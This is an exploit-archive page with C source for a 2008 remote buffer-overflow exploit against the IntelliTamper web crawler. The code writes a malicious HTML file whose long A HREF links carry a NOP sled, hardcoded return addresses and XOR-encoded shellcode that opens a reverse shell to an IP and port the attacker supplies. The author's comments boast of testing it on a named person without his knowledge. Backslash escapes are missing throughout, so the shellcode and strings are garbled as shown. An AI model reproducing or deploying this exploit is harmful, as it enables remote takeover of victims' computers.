IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
# Published : 2008-08-13
# Author : kralor
# Previous Title : BIND 9.5.0-P2 (randomized ports) Remote DNS Cache Poisoning Exploit
# Next Title : Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability
/********************************************************************/
/* [Crpt]  IntelliTamper v2.07/2.08 Beta 4 sploit by kralor  [Crpt] */
/********************************************************************/
/*                             NO MORE                              */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/********************************************************************/
/* Exploit test?? sur Jef_FR a son insu, ca marche bien a 100%  :)     */
/* Jef_FR pourra vous le confirmer hihi :P                          */
/* Au fait c'est universel pcq si la personne utilise la v2.08beta4 */
/* ben y'a du SEH alors le premier lien qui est fait plus petit     */
/* pour la v2.07 ca fera pas planter, ca sera pris en charge par le */
/* programme.. Bref que dire de plus... Si ce n'est qu'on peut p-e  */
/* jumper direct sans aller a un jmp ebx, en utilisant 0x00F1FFDC   */
/* j'ai remarqu?? que sur les deux versions une fois que ca crash    */
/* (je catch l'exception meme si le prog a du SEH!) ebx pointe vers */
/* cet offset toujours le meme (~fin de notre buffer). J'ai pas     */
/* regard?? sur d'autres plateformes, vu que j'ai deja des ret       */
/* (jmp ebx) qui vont tres bien  :)  c'est tout les poulets, enjoy.   */
/*                                                                  */
/* P.S: Faut regarder que votre IP xor?? par 0x98 donne pas un bad   */
/* opcode du genre < > " r n ... C'est pas sorcier a coder  :)      */
/********************************************************************/
/* informations: www.coromputer.net, irc undernet #coromputer       */
/********************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock.h>
#pragma comment(lib, "ws2_32")
#else
#include <arpa/inet.h>
#endif

#define SIZEOF   14448                 /* IntelliTamper v2.08 Beta 4 AND v2.07
                                        * for v2.07 it isn't this size 'cause
                                        * there's a *missing* in RET_ADDR2
                                        * so it cuts the size.
                                        */

#define SCOFFSET 10000                 /* IntelliTamper v2.08 Beta 4 */
#define RET_POS  SIZEOF-4
#define RET_ADDR 0x004368C4

#define SCOFFSET2 100                  /* IntelliTamper v2.07 */
#define RET_POS2  6832
#define RET_ADDR2 0x00437224

#define u_short unsigned short
#define u_char  unsigned char
#define HOP 0xd9 /* host opcode */
#define POP 0xda /* port opcode */
#define BEGIN "<HTML><HEAD>hi</HEAD>rn<BODY>rn"
#define END   "</BODY>rn</HTML>"

int set_sc(char *host,unsigned long port, char *sc)
{
  unsigned long ip,p;
  unsigned int i;

  ip=inet_addr(host)^0x98989898;
  p=htons((u_short)port);
  p=p<<16;
  p+=0x0002;
  p=p^0x98989898;

for(i=0;i<strlen(sc);i++) {
  if((u_char)sc[i]==HOP&&(u_char)sc[i+1]==HOP)
    if((u_char)sc[i+2]==HOP&&(u_char)sc[i+3]==HOP) {
      memcpy(sc+i,&ip,4);
      ip=0;
      }
  if((u_char)sc[i]==POP&&(u_char)sc[i+1]==POP)
    if((u_char)sc[i+2]==POP&&(u_char)sc[i+3]==POP) {
      memcpy(sc+i,&p,4);
      p=0;
      }
  }

if(ip||p) {
  printf("error: unable to find ip/port sequence in shellc0den");
  return -1;
  }
  return 0;
}

void syntax(char *prog)
{
  printf("syntax: %s <file> <rshell_ip> <rshell_port>n",prog);
  exit(0);
}

void banner(void)
{
  printf("nt[Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit " 
         "by kralor [Crpt]n");
  printf("tt  www.coromputer.net && undernet #coromputernn");
  return;
}

int main(int argc, char *argv[])
{
  char buffer[SIZEOF];
  unsigned long port;
  FILE *file;
  char shellc0de[] =   /* sizeof(shellc0de+xorer) == 334 bytes */
  /* classic xorer */
  /* "xcc" */
  "xebx02xebx05xe8xf9xffxffxffx5bx80xc3x10x33xc9x66"
  "xb9x3fx01x80x33x98x43xe2xfa"
  /* shellc0de */
  "x19x5cx50x98x98x98x13x74x13x6cxcdxcexfcx39xa8x98"
  "x98x98x13xd8x94x13xe8x84x35x13xf0x90x73x98x13x5d"
  "xc6xc5x11x9ex67xaexf0x16xd6x96x74x70x35x98x98x98"
  "xf0xabxaax98x98xf0xefxebxaaxc7xccx67x48x13x60xcf"
  "xf0x41x91x6dx35x70x0bx98x98x98xabx51xc9xc9xc9xc9"
  "xd9xc9xd9xc9x67x48x11xdexbcxcfxf0x74x61x32xf8x70"
  "xe1x98x98x98xf0xd9xd9xd9xd9xf0xdaxdaxdaxdax13x54"
  "xf2x88xc9x67xeexbcx67x48xf0xfbxf5xfcx98x11xfexa8"
  "x67xaexf0xeax66x2bx8ex70xc9x98x98x98x11xdex86x1b"
  "x74xccx15xa4xbcxabx58xabx51x1bx59x8dx33x7ax65x5e"
  "xdcxbcx88xdcx66xdcxbcxa5x66xdcxbcxa4x13xdexbcx11"
  "xdcxbcxd0x11xdcxbcxd4x11xdcxbcxc8x15xdcxbcx88xcc"
  "xc8xc9xc9xc9xf2x99xc9xc9x67xeexa8xc9x67xcex86x67"
  "xaexf0x77x56x78xf8x70x9ax98x98x98x67x48xcbxcdxce"
  "xcfx13xf4xbcx80x13xddxa4x13xccx9dxe0x9bx4dx13xd2"
  "x80x13xc2xb8x9bx45x7bxaaxd1x13xacx13x9bx6dxabx67"
  "x64xabx58x34xa2x5cxecx9fx59x57x95x9bx60x73x6axa3"
  "xe4xbcx8cxedx79x13xc2xbcx9bx45xfex13x94xd3x13xc2"
  "x84x9bx45x13x9cx13x9bx5dx73x9axabx58x13x4dxc7xc6"
  "xc5xc3x5ax9cx98";

  banner();

  if(argc!=4)
    syntax(argv[0]);

  port=atoi(argv[3]);
  if(port<=0||port>65535) {
    printf("error: <port> must be between 1 and 65535rn");
    return -1;
  }
  printf("[S] ip: %s port: %d file: %srn",argv[2],port,argv[1]);
  printf("[C] Setting universal %-39s ...","shellcode");
  if(set_sc(argv[2],port,shellc0de))
    return -1;
  printf("DONErn");
  file=fopen(argv[1],"w");
  if(!file) {
    printf("error: unable to open %srn",argv[1]);
    return -1;
  }
  printf("[C] Writing magic link for Intellitamper %-20s ...","v2.07");
  fprintf(file,BEGIN);
  fprintf(file,"sex drugs and rock'n'roll<BR>rn");

  memset(buffer,0x90,sizeof(buffer));
  *(unsigned long*)&buffer[RET_POS2] = RET_ADDR2;
  memcpy(buffer+SCOFFSET2,shellc0de,sizeof(shellc0de)-1);
  memcpy(buffer+6836-8,"xEBxE0",2); /* jmp $ - 0x10 */
  memcpy(buffer+6836-16,"xE9x8FxE5xFFxFF",5); /* jmp $ - ??? */

  fprintf(file,"<A HREF="");
  fprintf(file,buffer);
  fprintf(file,"">sexy bitch</A><BR>rn");
  printf("DONErn");

  printf("[C] Writing magic link for Intellitamper %-20s ...","v2.08 Beta 4");
  memset(buffer,0x90,sizeof(buffer));
  *(unsigned long*)&buffer[RET_POS] = RET_ADDR;
  memcpy(buffer+SCOFFSET,shellc0de,sizeof(shellc0de)-1);
  memcpy(buffer+SIZEOF-8,"xEBxE0",2); /* jmp $ - 0x10 */
  memcpy(buffer+SIZEOF-16,"xE9x8FxEBxFFxFF",5); /* jmp $ - ??? */

  fprintf(file,"<A HREF="");
  fprintf(file,buffer);
  fprintf(file,"">not sexy bitch</A><BR>rn");
  printf("DONErn");

  fprintf(file,END);
  fclose(file);
  printf("[C] All job donern");
  return 0;
}

// www.Syue.com [2008-08-13]